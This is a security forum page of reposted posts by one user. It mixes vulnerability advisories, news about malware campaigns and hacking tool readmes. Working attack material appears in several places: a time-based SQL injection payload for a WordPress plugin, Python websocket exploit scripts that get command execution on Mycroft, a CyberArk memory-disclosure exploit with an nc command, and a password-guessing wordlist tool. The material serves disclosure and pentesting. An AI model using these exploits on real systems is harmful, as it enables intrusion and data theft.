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Posts posted by Fi8sVrs

  1. WordPress WP Google Map plugin versions 4.0.4 and below suffer from remote SQL injection vulnerabilities.


    DefenseCode ThunderScan SAST Advisory: WordPress WP Google Map Plugin
     Multiple SQL injection Security Vulnerabilities
    Advisory ID:    DC-2018-05-002
    Advisory Title: WordPress WP Google Map Plugin Multiple SQL injection
    Advisory URL:   http://www.defensecode.com/advisories.php
    Software:       WordPress WP Google Map plugin
    Language:       PHP
    Version:        4.0.4 and below
    Vendor Status:  Vendor contacted, no response
    Release Date:   2018/06/12
    Risk:           High
    1. General Overview
    During the security audit of WP Google Map plugin for WordPress CMS,
    multiple SQL injection vulnerabilities were discovered using
    DefenseCode ThunderScan application source code security analysis
    More information about ThunderScan is available at URL:
    2. Software Overview
    According to the plugin developers, WP Google Map is #1 Google Maps
    plugin for WordPress. It allows you to create google maps shortcodes
    to display responsive google maps on pages, widgets and custom
    According to wordpress.org, it has more than 100,000 active installs.
    3. Vulnerability Description
    During the security analysis, ThunderScan discovered SQL injection
    vulnerabilities in WP Google Map WordPress plugin.
    The easiest way to reproduce the vulnerabilities is to visit the
    provided URL while being logged in as administrator or another user
    that is authorized to access the plugin settings page. Users that do
    not have full administrative privileges could abuse the database
    access the vulnerabilities provide to either escalate their privileges
    or obtain and modify database contents they were not supposed to be
    able to.
    Due to the missing nonce token, the vulnerable code is also directly
    exposed to attack vectors such as Cross Site request forgery (CSRF).
    3.1 SQL injection
      Vulnerable Function:  $wpdb->get_results()
      Vulnerable Variable:  $_GET['order']
      Vulnerable URL:
    PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
      File:                 wp-google-map-plugin/core/class.tabular.php
      520 $order   = ( ! empty( $_GET['order'] ) ) ? wp_unslash(
    $_GET['order'] ) : 'asc';
      522 $query_to_run .= " order by {$orderby} {$order}";
      530 $this->data = $wpdb->get_results( $query_to_run );
    3.2 SQL injection
      Vulnerable Function:  $wpdb->get_results()
      Vulnerable Variable:  $_GET['orderby']
      Vulnerable URL:
      File:                 wp-google-map-plugin/core/class.tabular.php
      519 $orderby = ( ! empty( $_GET['orderby'] ) ) ? wp_unslash(
    $_GET['orderby'] ) : $this->primary_col;
      522 $query_to_run .= " order by {$orderby} {$order}";
      530 $this->data = $wpdb->get_results( $query_to_run );
    4. Solution
    All users are strongly advised to update WordPress WP Google Map
    plugin to the latest available version as soon as the vendor releases
    an update that fixes the vulnerabilities.
    5. Credits
    Discovered by Neven Biruski using DefenseCode ThunderScan source code
    security analyzer.
    6. Disclosure Timeline
    2018/05/11   Vulnerabilities discovered
    2018/05/16   Vendor contacted
    2018/06/08   No response
    2018/06/12   Advisory released to the public
    7. About DefenseCode
    DefenseCode L.L.C. delivers products and services designed to analyze
    and test web, desktop and mobile applications for security
    DefenseCode ThunderScan is a SAST (Static Application Security
    Testing, WhiteBox Testing) solution for performing extensive security
    audits of application source code. ThunderScan SAST performs fast and
    accurate analyses of large and complex source code projects delivering
    precise results and low false positive rate.
    DefenseCode WebScanner is a DAST (Dynamic Application Security
    Testing, BlackBox Testing) solution for comprehensive security audits
    of active web applications. WebScanner will test a website's security
    by carrying out a large number of attacks using the most advanced
    techniques, just as a real attacker would.
    Subscribe for free software trial on our website
    http://www.defensecode.com/ .
    E-mail: defensecode[at]defensecode.com
    Website: http://www.defensecode.com
    Twitter: https://twitter.com/DefenseCode/


  2. "Hey Mycroft, we've got a Problem"

    Getting "Zero Click" Remote Code Execution in Mycroft AI vocal assistant




    During my journey contributing to open source I was working with my friend Matteo De Carlo on an AUR Package of a really interesting project called Mycroft AI. It's an AI-powered vocal assistant started with a crowdfunding campaign in 2015 and a more recent one that allowed Mycroft to produce their Mark-I and Mark-II devices. It's also running on Linux Desktop/Server, Raspberry PI and will be available soon™ on Jaguar Type-F and Land Rover


    Digging in the source code

    While looking at the source code I found an interesting point: here

    host = config.get("host")
    port = config.get("port")
    route = config.get("route")
    validate_param(host, "websocket.host")
    validate_param(port, "websocket.port")
    validate_param(route, "websocket.route")
    routes = [
            (route, WebsocketEventHandler)
    application = web.Application(routes, **settings)
    application.listen(port, host)


    So there is a websocket server that doesn't require authentication that by default is exposed on Let's test it wink

    #!/usr/bin/env python
    import asyncio
    import websockets
    uri = "ws://myserver:8181/core"
    command = "say pwned"
    async def sendPayload():
        async with websockets.connect(uri) as websocket:
            await websocket.send("{\"data\": {\"utterances\": [\""+command+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}")

    And magically we have an answer from the vocal assistant saying pwned!

    Well, now we can have Mycroft pronounce stuff remotely, but this is not a really big finding unless you want to scare your friends, right?




    The skills system

    Digging deeper we can see that Mycroft has a skills system and a default skill that can install others skills (pretty neat, right?)

    How is a skill composed? From what we can see from the documentation a default skill is composed by:

    • dialog/en-us/command.dialog contains the vocal command that will trigger the skill
    • vocab/en-us/answer.voc contains the answer that Mycroft will pronounce
    • requirements.txt contains the requirements for the skill that will be installed with pip
    • __int__.py contains the main function of the skill and will be loaded when the skill is triggered


    What can I do?

    I could create a malicious skill that when triggered runs arbitrary code on the remote machine, but unfortunately this is not possible via vocal command unless the URL of the skill is not whitelisted via the online website. So this is possible but will be a little tricky.


    So I'm done?

    Not yet. I found out that I can trigger skills remotely and that is possible to execute commands on a remote machine convincing the user to install a malicious skill. I may have enough to submit a vulnerability report. But maybe I can do a bit better...


    Getting a remote shell using default skills

    We know that Mycroft has some default skills like open that will open an application and others that are whitelisted but not installed. Reading through to the list, I found a really interesting skill called skill-autogui, whose description says Manipulate your mouse and keyboard with Mycroft. We got it!

    Let's try to combine everything we found so far into a PoC:

    #!/usr/bin/env python
    import sys
    import asyncio
    import websockets
    import time
    cmds = ["mute audio"] + sys.argv[1:]
    uri = "ws://myserver:8181/core"
    async def sendPayload():
        for payload in cmds:
            async with websockets.connect(uri) as websocket:
                await websocket.send("{\"data\": {\"utterances\": [\""+payload+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}")

    Running the exploit with python pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" allowed me to finally get a command execution on a Linux machine.






    • open xterm was needed because my test Linux environment had a DE installed, on a remote server the commands will be executed directly on TTY so this step is not nesessary.
    • The skill branching had a big change and now some skills are not (yet) available (autogui is one of them) but this is not the real point. Mycroft has skills to interact with domotic houses and other services that can still be manipulated (the lack of imagination is the limit here). The vulnerability lies in the lack of authentication for the ws.


    Affected devices

    All the devices running Mycroft <= ? with the websocket server exposed (Mark-I has the websocket behind a firewall by default)


    Interested in my work?

    Follow me on:



    • 08/03/2018 Vulnerability found
    • 09/03/2018 Vulnerability reported
    • 13/03/2018 The CTO answered that they are aware of this problem and are currently working on a patch
    • 06/06/2018 The CTO said that they have no problem with the release of the vulnerability and will add a warning to remember the user to use a firewall ¯\_(ツ)_/¯
    • 09/06/2018 Public disclosure




    • Thanks 1
    • Upvote 1
  3. spam_email-680x400.jpg


    The Necurs botnet is driving a fresh spam campaign that uses Excel Web Query (.IQY) file attachments to skim under the antivirus radar. If successful, the attack ultimately delivers the remote access trojan (RAT) known as FlawedAmmyy.


    This is the third wave in an offensive that started in late May. The emails, posing as internal company communications regarding an “unpaid invoice,” are part of one of the first prolific campaigns in the wild to use .IQY attachments, according to Barkly researchers.


    Unlike full Excel spreadsheets, which are usually inspected by AV engines when they come in as email attachments, the comparatively diminutive .IQY files aren’t usually indexed by AV software. This is likely because they’ve never really been weaponized in the past, plus, they’re lightweight affairs from a size perspective, being simple, plaintext files.


    As a result, this week’s campaign has had remarkably low detections, according to VirusTotal.


    Researcher Derek Knight (@dvk01uk), who spotted the first campaign, pointed out that “These blow past all antiviruses because they have no malicious content.”


    However, .IQY files are deceptive, because they act as downloaders. “They’re extremely simple (just a few lines of text), but also powerful,” said Barkly researchers, in an analysis this week. “The .IQY files used in these campaigns download a PowerShell script, which is launched via Excel and kicks off a chain of malicious downloads.”


    When opened, the .IQY file launches via Excel (its default program) and attempts to pull data from the URL included inside. In the case of the Necurs spam, that data happens to be a malicious PowerShell script.

    Barkly researchers added, “The ability of these files to open Excel and (if users choose to ignore warnings) download any data from the internet makes them extremely dangerous.”


    The Payload and the Botnet

    Built from leaked source code of the popular remote desktop software Ammyy Admin, FlawedAmmyy first drew attention to itself in March. Proofpoint researchers discovered at the time that the previously undocumented RAT had actually been used since the beginning of 2016.


    It’s been used in two types of campaigns: highly targeted email attacks against the automotive industry, among others; and massive, multi-million message campaigns that Proofpoint researchers said appear to be associated with threat actor TA505, which has been active for the last four years.


    FlawedAmmy offers the same bells and whistles as the legitimate version: complete access to victim machines. That allows them to steal files and credentials, hijack computers to send out more spam emails, and more.


    Meanwhile, the choice of Necurs as a delivery mechanism makes for a wide attack surface. Over the past five years it has become the Scarface of spam, working its way up from nothing to sit atop a massive criminal enterprise.


    Cisco Talos analysis shows it to be the world’s largest spambot, accounting for more than 90 percent of the daily spam seen by the firm. Its evaluation of Necurs traffic between August and November of last year detected more than 2.1 million spam messages, sent from almost 1.2 million distinct sending IP addresses, in over 200 countries and territories.



    Barkly pointed out that as long as Microsoft Office is configured to block external content (which is the default), when Excel launches users will be presented with a warning prompt, and users must actively choose to enable the macros:


    Even if a user clicks “yes,” another prompt shows up:



    For IT admins that don’t want to leave protection to user awareness, Barkly suggests adjusting the firewall settings and email filtering to block .IQY files altogether unless they’re actively used in the business.


    It’s also possible to instruct Windows to always open .IQY files in Notepad so they can be inspected by IT before they launch.


    It’s wise to have a plan, given that these specific campaigns are likely not the end of criminals using .IQY files.


    “The ease in which .IQY files can be created, combined with the ubiquity of Excel, could even put .IQY files roughly on par with macros in terms of potential for abuse,” Barkly researchers said. “The fact that they are being utilized in multiple Necurs campaigns means the genie is completely out of the bottle and more widespread abuse is likely on the way.”




  4. 68747470733a2f2f63646e2d696d616765732d31

    Quick Installation:

    $ git clone https://github.com/localh0t/m4ngl3m3
    $ cd m4ngl3m3
    $ ./main.py


    Basic Help:

    usage: main.py [-h] [-fy FROM_YEAR] [-ty TO_YEAR] [-sy] [-nf NUMBERS_FILE]
                   [-sf SYMBOLS_FILE] [-cf CUSTOM_FILE] [-sbs] [-sap]
                   [-mm MUTATION_METHODS]
    Common password pattern generator using strings list
    positional arguments:
      MUTATION_MODE         Mutation mode to perform: (prefix-mode | 
                            suffix-mode | dual-mode)
      STRINGS_FILE          File with strings to mutate
      OUTPUT_FILE           Where to write the mutated strings
    optional arguments:
      -h, --help            show this help message and exit
      -fy FROM_YEAR, --from-year FROM_YEAR
                            Year where our iteration starts (default: 
      -ty TO_YEAR, --to-year TO_YEAR
                            Year where our iteration ends (default: 
      -sy, --short-year     Also add shorter year form when iterating 
                            (default: False)
      -nf NUMBERS_FILE, --numbers-file NUMBERS_FILE
                            Numbers prefix/suffix file (default:
      -sf SYMBOLS_FILE, --symbols-file SYMBOLS_FILE
                            Symbols prefix/suffix file (default:
      -cf CUSTOM_FILE, --custom-file CUSTOM_FILE
                            Custom words/dates/initials/etc file 
                            (default: None)
      -sbs, --symbols-before-suffix
                            Insert symbols also before years/numbers/
                            custom (when in suffix-mode or dual-mode)
                            (default: False)
      -sap, --symbols-after-prefix
                            Insert symbols also after years/numbers/
                            custom (when in prefix-mode or dual-mode) 
                            (default: False)
      -mm MUTATION_METHODS, --mutation-methods MUTATION_METHODS
                            Mutation methods to perform (comma
                            separated, no spaces) (valid: see

    --from-year (-fy), --to-year (-ty):

    Here we set where we want our script to start and end iterating over years. Many times people include the current year in an effort to add some entropy. Because passwords could be outdated, or the years included could be in the (near) future, we are going to add them as a range. For online environments, we would be looking at a conservative approach and only include ranges in the order of (-1, +1) or (-2, +2). For offline environments, the range could be wider to (-20, +5) or even (-50, +10). Output example:


    --short-year (-sy):

    When iterating years, also add its shorter double digit form. Output example:


    --numbers-file (-nf):

    In this argument we are going to select a file containing numbers that people frequently add to their passwords. By default I included 6 sets, the largest being the 6, and the rest being subsets of the previous one. The numbers included in the first sets (1,2…) are more likely to be present that the ones only included in latest sets (…5,6). Again, for online environments, we would be looking at using the first three sets, where in offline environments, we could use the last ones. By default, the script uses the set number 2. Output example:


    --symbols-file (-sf):

    In this argument we are going to select a file containing symbols that people frequently add to their passwords. Again, set number 1 is the shortest, set number 6 is the largest. The symbols included in the first sets (1,2…) are more likely to be present that the ones only included in latest sets (…5,6). By default, the script uses the set number 2. Output example:


    --custom-file (-cf):

    Here we add anything else we know about our targets (and it’s not considered as the “base” of the password itself). Let the creativity roll in! It could be from company initials, birth dates, special dates… to specific years, short keywords, etc. This custom strings will be treated in the same way that the years/numbers. Output example:


    MUTATION_MODE (positional argument):

    In this parameter we are going to select how the tool will work when shifting strings. You can choose one of three:

    • suffix-mode: It will add years, numbers, symbols and custom after the main string. Example: password2018!
    • prefix-mode: It will add years, numbers, symbols and custom before the main string. Example: !2018password
    • dual-mode: As the name suggests, it uses both modes (generates both outputs).


    STRINGS_FILE (positional argument):

    File containing strings to mutate. If you’re for example, doing a pentest and don’t know where to start, I would suggest you using a tool like CeWL to spider the company website, and keep the most recurring words (including the company name of course).


    OUTPUT_FILE (positional argument):

    Simply, file where we want to write the mutated strings.


    --symbols-before-suffix (-sbs):

    When this flag is enabled, and we are running the tool either in suffix-mode or dual-mode, the script will also add the symbols before years/numbers/custom. Output example:


    --symbols-after-prefix (-sap):

    When this flag is enabled, and we are running the tool either in prefix-mode or dual-mode, the script will also add the symbols after years/numbers/custom. Output example:


    --mutation-methods (-mm):

    In this parameter we define which mutation methods are going to be performed. Mutation methods are base transformations made before starting iterating over years/numbers/symbols/custom. You can select as many mutation methods as you want. For a list of all valid mutation methods, check: MUTATION_METHODS.md.
    By default, m4ngl3m3! runs with the following: Normal, UpperCase, FirstUp and ReplaceVowels.


    Usage examples:

    In order to see some basic usage examples, please take a look at: USAGE_EXAMPLES.md



    • Thanks 1
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  5. Pentesting suite for Maltego based on data in a Metasploit database





    THIS IS A BETA RELEASE, please be nice and report any issues

    msploitego leverages the data gathered in a Metasploit database by enumerating and creating specific entities for services. Services like samba, smtp, snmp, http have transforms to enumerate even further. Entities can either be loaded from a Metasploit XML file or taken directly from the Postgres msf database



    • Python 2.7
    • Has only been tested on Kali Linux
    • software installations
      • Metasploit Framework
      • nmap
      • enum4linux
      • snmp-check
      • nikto
      • exploitdb



    • In Maltego import config from msploitego/src/msploitego/resources/maltego/msploitego.mtz
    • checkout and update the transform path inside Maltego
      • easiest way would be to create a symbolic link to the transforms directory in /root/)
      • ln -s /path/to/your/msploitego/src/msploitego/transforms /root/


    General Use

    Using exported Metasploit xml file

    run a db_nmap scan in metatasploit, or import a previous scan

    • msf> db_nmap -vvvv -T5 -A -sS -ST -Pn

    • msf> db_import /path/to/your/nmapfile.xml

    • export the database to an xml file

    • msf> db_export -f xml /path/to/your/output.xml

    • In Maltego drag a MetasploitDBXML entity onto the graph.

    • Update the entity with the path to your metasploit database file.

    • run the MetasploitDB transform to enumerate hosts.

    • from there several transforms are available to enumerate services, vulnerabilities stored in the metasploit DB


    Using Postgres

    • drag and drop a Postgresql DB entity onto the canvas, enter DB details.
    • run the Postgresql transforms directly against a running DB



    • Instead of running a nikto scan directly from Maltego, I've opted to include a field to for a Nikto XML file. Nikto can take long time to run so best to manage that directly from the os. Enter the full path filename in the 'Nikto File' field, then run the Nikto parser to enumerate.



    • Connect directly to the postgres database - BETA
    • Much, much, much more tranforms for actions on generated entities.


    Download: msploitego-master.zip

    git clone https://github.com/shizzz477/msploitego.git





  6. drupal-hacking.png


    Hundreds of thousands of websites running on the Drupal CMS—including those of major educational institutions and government organizations around the world—have been found vulnerable to a highly critical flaw for which security patches were released almost two months ago.

    Security researcher Troy Mursch scanned the whole Internet and found over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings.


    Drupalgeddon2 (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites.

    For those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user.

    Since Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially.




    However, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) exploit code of Drupalgeddon2 was published online, which was followed by large-scale Internet scanning and exploitation attempts.


    Shortly after that, we saw attackers developed automated exploits leveraging Drupalgeddon 2 vulnerability to inject cryptocurrency miners, backdoors, and other malware into websites, within few hours after it's detailed went public.

    Mursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2.

    While analyzing vulnerable websites, Mursch noticed that hundreds of them—including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service—have already been targeted by a new cryptojacking campaign.

    Mursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed.

    We have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the "backdoors or fix compromised sites." To fully resolve the issue you are recommended to follow this Drupal guide.


    Via thehackernews.com

  7. xray.png

    • Safely scan for vulnerabilities on your Android phone or tablet
    • Assess your mobile security risk
    • Keep your carrier honest


    What is X-Ray?

    X-Ray allows you to scan your Android device for security vulnerabilities that put your device at risk.

    X-Ray was developed by the security experts at Duo Security. We hope that X-Ray will empower users with knowledge of vulnerabilities on their devices and allow them to take action to improve their security. We encourage users to contact their carriers and ask for their devices to be patched.

    Think your Android device is secure? X-Ray helps prove it to you.


    What does X-Ray do?

    X-Ray scans your Android device to determine whether there are vulnerabilities that remain unpatched by your carrier. The X-Ray app presents you with a list of vulnerabilities that it is able to identify and allows you to check for the presence of each vulnerability on your device.

    X-Ray has detailed knowledge about a class of vulnerabilities known as “privilege escalation” vulnerabilities. Such vulnerabilities can be exploited by a malicious application to gain root privileges on a device and perform actions that would normally be restricted by the Android operating system. A number of such vulnerabilities have been discovered in the core Android platform, affecting nearly all Android devices. Even more have been discovered in manufacturer-specific extensions that may affect a smaller subset of Android users. Unfortunately, many of these privilege escalation vulnerabilities remain unpatched on large populations of Android devices despite being several years old.





    There are two ways of downloading X-Ray:

    On your phone or tablet, visit:



    Scan this barcode:


    • Upvote 1
  8. This archive contains all of the 282 exploits added to Packet Storm in May, 2018.



     Directory of \1805-exploits\1805-exploits
    04/06/2018  21:02    <DIR>          .
    04/06/2018  21:02    <DIR>          ..
    08/05/2018  15:44             4,190 2345sg37-dos.txt
    15/05/2018  10:41             4,116 2345sg37nsprotect-dos.txt
    04/05/2018  02:07             1,139 adobereaderpdf-inject.txt
    21/05/2018  05:44             1,883 advsws10-xssxsrfsql.txt
    20/05/2018  17:16             2,353 aem-exec.txt
    22/05/2018  07:59             6,806 af_packet_chocobo_root_priv_esc.rb.txt
    17/05/2018  21:42             6,665 af_packet_packet_set_ring_priv_esc.rb.txt
    26/05/2018  23:24             1,209 ajaxffc20-sql.txt
    28/05/2018  04:03               893 alftp531-overflow.txt
    10/05/2018  10:56               801 allokvideosplitter311217-dos.txt
    25/05/2018  03:22             3,173 androidos-disclose.txt
    28/05/2018  18:32             3,937 appnitromachform-sqlshelltraversal.txt
    03/05/2018  02:55               671 arastta162-xss.txt
    24/05/2018  19:08             1,761 aspnetjvideokit-sql.txt
    02/05/2018  05:53            16,237 asustorexploit-master.zip
    22/05/2018  05:44             1,664 autocar12-sqlxss.txt
    31/05/2018  21:06             1,439 axonpbx-dllhijack.txt
    31/05/2018  21:07               737 axonpbx202-xss.txt
    27/05/2018  09:22               885 babynamessearchengine10-sql.txt
    14/05/2018  18:35               561 bbpress25-xss.txt
    27/05/2018  20:32             1,109 bitmainantminer-exec.txt
    04/05/2018  01:56             5,562 ble_norton_core-master.tgz
    22/05/2018  02:02             2,445 boersede-xss.txt
    27/05/2018  04:42               865 bookingwizzbookingsystem55-sql.txt
    31/05/2018  21:09             5,584 brotherhl-xss.txt
    31/05/2018  21:50             7,990 bypassuac_sluihijack.rb.txt
    31/05/2018  21:11               537 chitasoft362-sql.txt
    18/05/2018  13:22             2,210 ciscosa520w-traversal.txt
    27/05/2018  10:22             1,624 clippercms133-xss.txt
    28/05/2018  05:02             6,427 cloudmesyncseh-overflow.txt
    04/05/2018  02:01           788,501 cod-exploit-master.tgz
    04/05/2018  02:20            14,753 CORE-2018-0001.txt
    31/05/2018  21:49            58,347 CORE-2018-0002.txt
    31/05/2018  21:52            25,979 CORE-2018-0004.txt
    15/05/2018  22:52             4,937 CSNC-2018-002.txt
    15/05/2018  23:08             5,780 CSNC-2018-003.txt
    04/05/2018  18:41             2,487 cspmysqlum231-sql.txt
    31/05/2018  21:36             1,302 csvimportexport110-sqlxss.txt
    11/05/2018  09:11             3,820 delltouchpad-dos.txt
    07/05/2018  19:20             3,876 DEVICELOCK-PLUG-PLAY-AUDITOR-v5.72-UNICODE-BUFFER-OVERFLOW.txt
    08/05/2018  16:43             7,312 dlinkdir868l-xsrf.txt
    20/05/2018  17:15             3,664 dlinkdsl3782-bypass.txt
    24/05/2018  19:45             3,138 dlink_dsl2750b_exec_noauth.rb.txt
    27/05/2018  05:33            29,872 dolibarr700-exec.txt
    27/05/2018  04:33             6,976 dolibarr700-sql.txt
    27/05/2018  06:55             6,304 dolibarr700-xss.txt
    28/05/2018  10:32             1,267 domainmod40903-xss.txt
    18/05/2018  15:02             2,988 dynorootdhcp-exec.txt
    26/05/2018  23:35             5,358 easybilling10-sqlxssxsrf.txt
    24/05/2018  19:12             2,557 easyfileuploader17-shell.txt
    22/05/2018  05:02             1,604 easyfileuploader17-sqlxss.txt
    26/05/2018  23:26               610 easyletters10-sql.txt
    20/05/2018  17:13            10,699 easympegdvdburner1711-overflow.txt
    22/05/2018  17:02             3,678 easyservicebilling10-sqlxss.txt
    09/05/2018  18:50             3,427 EHCP-v0.37.12.b-CLEARTEXT-PASSWORD-STORAGE.txt
    09/05/2018  18:49             4,857 EHCP-v0.37.12.b-INSECURE-CRYPTO.txt
    09/05/2018  18:48             3,661 EHCP-v0.37.12.b-MULTIPLE-CSRF.txt
    09/05/2018  18:51             3,023 EHCP-v0.37.12.b-UNVERIFIED-PASSWORD-CHANGE.txt
    09/05/2018  18:47             2,869 EHCP-v0.37.12.b-XSS-COOKIE-THEFT.txt
    09/05/2018  18:46             3,869 EHCP-v0.37.12.b-XSS-FTP-BACKDOOR-ACCOUNT.txt
    13/05/2018  22:41               971 emcrecoverpoint43-inject.txt
    03/05/2018  02:30             1,924 emdb1711-overflow.txt
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    03/05/2018  02:38             2,924 eximbase64d-exec.txt
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    08/05/2018  16:42             2,254 ftpshellclient67-overflow.txt
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    07/05/2018  19:15             6,459 playsms_filename_exec.rb.txt
    07/05/2018  19:17             6,439 playsms_uploadcsv_exec.rb.txt
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    18/05/2018  14:02             2,175 prime95294b8-overflow.txt
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    29/05/2018  14:02             1,159 psjf-exec.txt
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    22/05/2018  04:33             8,020 r344depbypass-overflow.txt
    19/05/2018  07:48             6,275 rds_priv_esc.rb.txt
    16/05/2018  23:05             1,116 rockwellscadasystem27011-xss.txt
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    14/05/2018  18:29             3,259 SA-20180501-0.txt
    16/05/2018  23:20            10,380 SA-20180516-0.txt
    29/05/2018  18:22             8,260 SA-20180529-0.txt
    18/05/2018  15:32             1,422 sapb2bb2ccrm-lfi.txt
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    18/05/2018  05:44             1,539 sapnetweaverwebdynpro-disclose.txt
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    21/05/2018  02:11             2,116 schneiderelectricplcs-xsrf.txt
    30/05/2018  02:11             1,869 searchblox866-xsrf.txt
    29/05/2018  12:11           502,867 SharepointUserEnumeration-180528-FullDisclosure.pdf
    26/05/2018  23:54               662 sharetronixcms362-xsrf.txt
    24/05/2018  18:34             1,614 shippingsystemcms10-sql.txt
    24/05/2018  19:05               734 siemensscalances613-dos.txt
    18/05/2018  12:11               861 siemenssimaticpanels-xsrfxss.txt
    22/05/2018  10:22               541 siemenssimatics71200-xsrf.txt
    22/05/2018  15:02               548 siemenssimatics71200-xss.txt
    30/05/2018  03:22               574 siemenssimatics7300-dos.txt
    16/05/2018  23:10             4,636 signal-htmlinject.txt
    15/05/2018  10:47             4,086 signaldesktop-inject.txt
    29/05/2018  05:22             4,305 sitemakinslac10-sql.txt
    24/05/2018  19:03             1,562 sktltewifisdtcw3b1-bypass.txt
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    28/05/2018  04:03             2,640 softwareadvice10-xss.txt
    16/05/2018  23:14             3,905 struts2_code_exec_showcase.rb.txt
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    15/05/2018  10:45             2,950 wpulike31-xss.txt
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    22/05/2018  11:11             1,028 ZSL-2018-5463.txt
    22/05/2018  12:11             1,509 ZSL-2018-5464.txt
    22/05/2018  15:44               886 ZSL-2018-5465.txt
    22/05/2018  16:22             1,022 ZSL-2018-5466.txt
    22/05/2018  13:02             1,383 ZSL-2018-5467.txt
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    23/05/2018  00:22             2,451 ZSL-2018-5469.txt
    29/05/2018  19:32             8,008 ZSL-2018-5470.tgz
    30/05/2018  04:33             7,909 ZSL-2018-5471.tgz
                 283 File(s)     11,278,723 bytes


    Download: 1805-exploits.tgz (10 MB)



    • Like 1
  9. CyberArk versions prior to 10 suffer from a memory disclosure vulnerability.


    # Exploit Title: CyberArk < 10 - Memory Disclosure
    # Date: 2018-06-04
    # Exploit Author: Thomas Zuk
    # Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
    # Version: < 9.7 and < 10
    # Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
    # CVE: CVE-2018-9842
    # Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
    # paste the following bytes into a hexedited file named logon.bin:
    import socket
    import os
    import sys
    ip = ""
    port = 1858
    # Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services.
    # The below is a sample login request that is needed to receive the memory
    pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00"
    for iteration in range(0, 110):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        # recieve response
        reply = s.recv(1500)
        # write responses to file
        file = open("cyberark_memory", "a")
        file.write("received: \n")


    • Upvote 1
  10. hard-drive-crash-hack.png


    Researchers have demonstrated how sonic and ultrasonic signals (inaudible to human) can be used to cause physical damage to hard drives just by playing ultrasonic sounds through a target computer's own built-in speaker or by exploiting a speaker near the targeted device.

    Similar research was conducted last year by a group of researchers from Princeton and Purdue University, who demonstrated a denial-of-service (DoS) attack against HDDs by exploiting a physical phenomenon called acoustic resonance.

    Since HDDs are exposed to external vibrations, researchers showed how specially crafted acoustic signals could cause significant vibrations in HDDs internal components, which eventually leads to the failure in systems that relies on the HDD.


    To prevent a head crash from acoustic resonance, modern HDDs use shock sensor-driven feedforward controllers that detect such movement and improve the head positioning accuracy while reading and writing the data.

    However, according to a new research paper published by a team of researchers from the University of Michigan and Zhejiang University, sonic and ultrasonic sounds causes false positives in the shock sensor, causing a drive to unnecessarily park its head.




    By exploiting this disk drive vulnerability, researchers demonstrated how attackers could carry out successful real-world attacks against HDDs found in CCTV (Closed-Circuit Television) systems and desktop computers.


    "An attacker can use the effects from hard disk drive vulnerabilities to launch system level consequences such as crashing Windows on a laptop using the built-in speaker and preventing surveillance systems from recording video," the research paper reads.

    These attacks can be performed using a nearby external speaker or through the target system's own built-in speakers by tricking the user into playing a malicious sound attached to an email or a web page.

    In their experimental set-up, the researchers tested acoustic and ultrasonic interferences against various HDDs from Seagate, Toshiba and Western Digital and found that ultrasonic waves took just 5-8 seconds to induce errors.


    However, sound interferences that lasted for 105 seconds or more caused the stock Western Digital HDD in the video-surveillance device to stop recording from the beginning of the vibration until the device was restarted.


    "In the case that a victim user is not physically near the system being attacked, an adversary can use any frequency to attack the system," the researchers explain. 


    "The system's live camera stream never displays an indication of an attack. Also, the system does not provide any method to learn of audio in the environment. Thus, if a victim user were not physically near the system, an adversary can use audible signals while remaining undetected."



    The researchers were also able to disrupt HDDs in desktops and laptops running both Windows and Linux operating system. They took just 45 seconds to cause a Dell XPS 15 9550 laptop to freeze and 125 seconds to crash when the laptop was tricked to play malicious audio over its built-in speaker.


